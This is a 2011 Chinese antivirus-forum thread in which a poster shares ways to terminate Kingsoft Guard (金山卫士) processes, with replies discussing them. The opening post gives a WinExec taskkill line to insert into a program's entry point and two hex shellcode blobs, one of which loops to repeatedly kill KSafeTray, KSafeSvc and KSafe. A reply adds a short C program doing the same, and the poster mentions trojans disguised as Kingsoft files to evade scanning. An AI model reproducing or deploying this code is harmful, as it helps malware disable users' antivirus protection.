查看: 3351|回复: 22
收起左侧

[金山] K金山卫士的方法

[复制链接]
rsin
发表于 2011-12-16 20:56:54 | 显示全部楼层 |阅读模式
本帖最后由 rsin 于 2011-12-16 20:57 编辑

意在讨论完善金山毒霸,无口水之意。
K金山卫士的方法 如果你有源码 查找

入口函数  int APIENTRY WinMain

然后加个 VC代码 WinExec("taskkill /f /im Ksafetray.exe",SW_HIDE);

或者生成EXE 给它加花指令

1.单单K一次金山卫士进程(修改新入口+0xC7处为原入口)
64A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80800000057696E457865630053FF54240CE81F0000007461736B6B696C6C202F696D204B73616665547261792E657865202F660000C744240400000000FFD0680010400064FF35000000006489250000000033C0F7F0
2.无限循环K金山卫士进程(修改新入口+0xD4处为原入口)
64A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80800000057696E457865630053FF54240CE9520100007461736B6B696C6C202F696D204B73616665547261792E657865202F660000C744240400000000FFD0E92D010000536C65657000FF742408FF5424086800010000FFD0E81200000064FF35000000006489250000000033C0F7F0812C24E6000000EBE5000064A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80D00000043726561746554687265616400FF74240CFF54240CE8000000005981E9A90100006A006A006A00516A006A00FFD0E806000000536C65657000FF74240CFF54240C6800050000FFD0680010400064FF35000000006489250000000033C0F7F000008944240CE866000000E81E0000007461736B6B696C6C202F696D204B736166655376632E657865202F660000596A0051FF542410E81C0000007461736B6B696C6C202F696D204B736166652E657865202F66D70000596A0051FF542410E8000000005981E99000000051E973FEFFFF5981E95B01000051E951FEFFFF
刚仔
发表于 2011-12-16 21:00:06 | 显示全部楼层
这是些神马东西。。。
MagicFuzzX
发表于 2011-12-16 21:00:28 | 显示全部楼层
那堆16进制是什么。。
李白vs苏轼
发表于 2011-12-16 21:03:10 | 显示全部楼层
本帖最后由 李白vs苏轼 于 2011-12-16 21:23 编辑

其实他没有自保把,没有阻止你结束进程,我没用过

WinExec里面使用了常用的结束进程的命令,并HIDE窗口

其实直接在system函数加,,不就行了,连HIDE都省了
  1. #include <stdlib.h>
  2. #include <stdio.h>
  3. int main(void)
  4. {
  5.         system("taskkill /f /im Ksafetray.exe");
  6.         return 0;
  7. }
复制代码
rsin
 楼主| 发表于 2011-12-16 21:12:02 | 显示全部楼层
李白vs苏轼 发表于 2011-12-16 21:03
其实他没有自保把,我没用过

WinExec里面使用了常用的结束进程的命令,并HIDE窗口

卫士的自保有也不行,现在木马一运行伪装成金山卫士,毒霸就怎么也不杀他
李白vs苏轼
发表于 2011-12-16 21:14:22 | 显示全部楼层
本帖最后由 李白vs苏轼 于 2011-12-16 21:30 编辑
rsin 发表于 2011-12-16 21:12
卫士的自保有也不行,现在木马一运行伪装成金山卫士,毒霸就怎么也不杀他


我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

现在木马一运行伪装成金山卫士,毒霸就怎么也不杀他



这句啥意思啊
rsin
 楼主| 发表于 2011-12-16 21:17:04 | 显示全部楼层
李白vs苏轼 发表于 2011-12-16 21:14
我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

yesha08
发表于 2011-12-16 21:40:32 | 显示全部楼层
没看懂,不过金山卫士的进程用任务管理器就能结束啊,卫士本来就没自保的,辅助软件
rsin
 楼主| 发表于 2011-12-16 21:48:09 | 显示全部楼层
yesha08 发表于 2011-12-16 21:40
没看懂,不过金山卫士的进程用任务管理器就能结束啊,卫士本来就没自保的,辅助软件

就是普通方法,不过请看5楼
rsin
 楼主| 发表于 2011-12-16 21:49:17 | 显示全部楼层
李白vs苏轼 发表于 2011-12-16 21:14
我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

就是把木马伪装成金山卫士的文件。金山毒霸就怎么也不会扫描到他并报毒
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-2 13:59 , Processed in 0.125718 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表